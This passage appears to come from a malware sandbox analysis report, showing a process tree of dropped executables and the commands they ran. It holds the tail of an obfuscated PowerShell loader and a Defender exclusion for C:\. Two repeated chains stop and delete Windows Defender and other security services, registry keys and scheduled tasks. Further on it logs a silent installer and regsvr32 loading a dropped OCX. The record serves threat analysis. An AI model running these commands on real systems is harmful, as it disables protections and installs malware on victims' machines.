wdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6080
      - C:\Users\Admin\AppData\Local\Temp\10374380101\25e0e44750.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10374380101\25e0e44750.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:220
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2624
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CC39.tmp\CC3A.tmp\CC3B.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5912
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CD33.tmp\CD34.tmp\CD35.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
        10⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:5300
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:4560
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:5472
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:4064
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:2036
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:756
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1552
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2440
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:5308
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:4576
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:4152
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1020
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1424
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:5572
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:6052
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:3712
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:4004
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:5484
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        
        PID:4104
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:2408
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        
        PID:4100
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        
        PID:1272
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:5720
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:5032
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:1280
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:2040
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:3096
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:3216
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:2928
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        
        PID:4676
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        
        PID:4128
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:6036
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:5824
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:1560
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:1916
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:5968
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:1244
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:3460
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:1636
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:700
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:4544
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4920
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:5716
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:1604
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:2608
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:1044
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:2892
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:4080
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:2896
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:3656
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:1192
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4336
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:1976
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:2096
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5940
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:2364
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:4124
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:1248
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:1644
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:2472
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        
        PID:4416
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:3476
      - C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4392
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c 67e8f4de3ad1d.vbs
        7⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3324
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
        8⤵
        
        PID:4364
      - C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3248
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2928
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ED9C.tmp\ED9D.tmp\ED9E.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
        8⤵
        
        PID:5776
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5968
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE96.tmp\EE97.tmp\EE98.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:1940
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:5716
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:5344
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:2608
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:5736
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:2892
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1372
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1252
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:1260
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:1568
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:1192
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:2140
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1976
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:2096
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:4756
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:2364
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:440
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:5880
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:3576
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:3060
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:2336
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:4416
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        
        PID:2756
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:3476
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4604
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:3236
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:2360
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:1596
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:3652
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:4480
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:4068
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:5248
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        
        PID:3468
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:4860
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:6048
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:5092
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3104
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:3140
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:5500
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        
        PID:2208
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:2560
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:3928
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4588
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:2068
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        
        PID:3948
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:3144
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:1836
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        
        PID:5488
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:1160
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:2060
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4024
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4332
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:3380
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        
        PID:1084
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:4352
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:5424
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:6132
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:3660
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:3800
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:2388
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:5036
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        
        PID:4364
      - C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:1564
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5776
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        8⤵
        Executes dropped EXE
        
        PID:2104
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4024
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5424
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:776
        
        C:\Users\Admin\AppData\Local\Temp\is-NJGEH.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NJGEH.tmp\Bell_Setup16.tmp" /SL5="$80052,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\is-8SVA4.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8SVA4.tmp\Bell_Setup16.tmp" /SL5="$1A02EA,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:1424
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        12⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:224
        
        C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        8⤵
        Executes dropped EXE
        
        PID:13204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
